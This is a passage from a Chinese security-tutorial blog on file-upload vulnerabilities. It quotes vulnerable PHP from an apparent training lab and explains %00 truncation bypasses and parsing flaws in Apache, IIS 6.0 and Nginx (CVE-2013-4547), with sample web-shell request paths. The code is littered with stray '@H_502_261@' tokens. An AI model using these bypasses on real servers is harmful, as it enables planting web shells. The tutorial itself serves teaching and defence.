        $temp_file = $_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['tmp_name'@H_502_261@]@H_502_261@;
        $img_path = $_GET@H_502_261@['save_path'@H_502_261@]@H_502_261@."/"@H_502_261@.rand@H_502_261@(10@H_502_261@, 99@H_502_261@)@H_502_261@.date@H_502_261@("YmdHis"@H_502_261@)@H_502_261@."."@H_502_261@.$file_ext@H_502_261@;

        if@H_502_261@(move_uploaded_file@H_502_261@($temp_file@H_502_261@,$img_path@H_502_261@)@H_502_261@)@H_502_261@{
            $is_upload = true@H_502_261@;
        @H_502_261@} else @H_502_261@{
            $msg = '上传出错！'@H_502_261@;
        @H_502_261@}
    @H_502_261@} else@H_502_261@{
        $msg = "只允许上传.jpg|.png|.gif类型文件！"@H_502_261@;
    @H_502_261@}
@H_502_261@}

• 白名单判断，但$img_path是直接拼接，因此可以利用%00截断绕过。

$img_path = $_GET@H_502_261@['save_path'@H_502_261@]@H_502_261@."/"@H_502_261@.rand@H_502_261@(10@H_502_261@, 99@H_502_261@)@H_502_261@.date@H_502_261@("YmdHis"@H_502_261@)@H_502_261@."."@H_502_261@.$file_ext@H_502_261@;

• 第二种： 对应upland第19题
• 前提条件： PHP版本 < 5.34 、PHP的magic_quotes_gpc为OFF状态
• 源码分析：

$is_upload = false@H_502_261@;
$msg = null@H_502_261@;
if @H_502_261@(isset@H_502_261@($_POST@H_502_261@['submit'@H_502_261@]@H_502_261@)@H_502_261@) @H_502_261@{
    if @H_502_261@(file_exists@H_502_261@(UPLOAD_PATH@H_502_261@)@H_502_261@) @H_502_261@{
        $deny_ext = array@H_502_261@("PHP"@H_502_261@,"htaccess"@H_502_261@)@H_502_261@;

        $file_name = $_POST@H_502_261@['save_name'@H_502_261@]@H_502_261@;
        $file_ext = pathinfo@H_502_261@($file_name@H_502_261@,PATHINFO_EXTENSION@H_502_261@)@H_502_261@;

        if@H_502_261@(!in_array@H_502_261@($file_ext@H_502_261@,$deny_ext@H_502_261@)@H_502_261@) @H_502_261@{
            $temp_file = $_FILES@H_502_261@['upload_file'@H_502_261@]@H_502_261@['tmp_name'@H_502_261@]@H_502_261@;
            $img_path = UPLOAD_PATH @H_502_261@. '/' @H_502_261@.$file_name@H_502_261@;
            if @H_502_261@(move_uploaded_file@H_502_261@($temp_file@H_502_261@, $img_path@H_502_261@)@H_502_261@) @H_502_261@{ 
                $is_upload = true@H_502_261@;
            @H_502_261@}else@H_502_261@{
                $msg = '上传出错！'@H_502_261@;
            @H_502_261@}
        @H_502_261@}else@H_502_261@{
            $msg = '禁止保存为该类型文件！'@H_502_261@;
        @H_502_261@}

    @H_502_261@} else @H_502_261@{
        $msg = UPLOAD_PATH @H_502_261@. '文件夹不存在,请手工创建！'@H_502_261@;
    @H_502_261@}
@H_502_261@}

• 发现move_uploaded_file()函数中的img_path是由post参数save_name控制的，因此可以在save_name利用00截断绕过，方法同上

3.5 服务器解析漏洞

• 解析漏洞,是指中间件(Apache、Nginx、iis等)在解析文件时出现了漏洞,从而,黑客可以利用该漏洞实现非法文件的解析。

3.5.1 Apache 解析漏洞

• Apache解析文件规则是从右到左。例如shel.PHP.gix.ccc，apache会先识别ccc，ccc不被识别，则识别gix，以此类推，最后会被识别为PHP来运行。
• Apache 解析漏洞

3.5.2 IIS6.0 漏洞

• 目录解析 :
• 目录名为.asp、.asa、.cer，则目录下的所有文件都会被作为ASP
• url/test.asp/shell.jpg会被当作asp脚本运行。
• 文件解析 ：
• 文件名中分号后不被解析，例如.asp;、.asa;、.cer;。
• url/test.asp;shell.jpg会被当作asp脚本运行。
• 文件类型解析 ：
• .asa，.cer，.cdx都会被作为asp文件执行。
• url/shell.asa会被作为asp文件执行。
• IIS 6.0 解析漏洞

3.5.3 Nginx 漏洞

• PHP+Nginx默认是以cgi的方式去运行，当用户配置不当，会导致任意文件被当作PHP去解析。
• 利用条件:
  以FastCGl运行
  cgi.fix_pathinfo=1(全版本PHP默认为开启)
• 例如如果满足上述条件，当你访问url/shell.jpg/shell.PHP时，shell.jpg会被当作PHP去执行。
• Nginx 解析漏洞

3.5.4 Nginx 文件名逻辑漏洞（CVE-2013-4547）了解

• 影响版本:Nginx 0.8.41 ~ 1.4.3/1.5.0 ~ 1.5.7
• 利用过程:
  上传一个shell.jpg文件，注意最后为空格
  访问url/shell.jpg[Ox20][Ox00].PHP
  (两个中括号中的数字是用Burp在Hex界面中更改)
• 漏洞复现参考链接

四、文件上传漏洞防御

• 服务端文件扩展名使用白名单检测+文件名重命名
• 对文件内容进行检测
• 对中间件做安全的配置
• …

五、作者说

• 首先跟各位亲爱的读者朋友道个歉！
• 博主最近事情实在是太多了。
• 熬夜肝了两周终于将文件上传漏洞这块结束了。
• 之前有读者反应说，我写的文章对小白有点儿不太有好，我再认真看过，反思之后决定从文件上传这里重现整理一下我的博文，希望这次之后大家能喜欢。
• 如果大家对博主还有其他的意见，或者对文章中有那些不明白可以私信博主，博主将尽心尽力为您解决。
  

  

---

各位路过的朋友，如果觉得可以学到些什么的话，点个赞 再走吧，欢迎各位路过的大佬评论，指正错误，也欢迎有问题的小伙伴评论留言，私信。

每个小伙伴的关注都是本人更新博客的动力！！！
请微信搜索【 在下小黄 】文章更新将在第一时间阅读 ！

博客中若有不恰当的地方，请您一定要告诉我。前路崎岖，望我们可以互相帮助，并肩前行！

---

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 [email protected] 举报，一经查实，本站将立刻删除。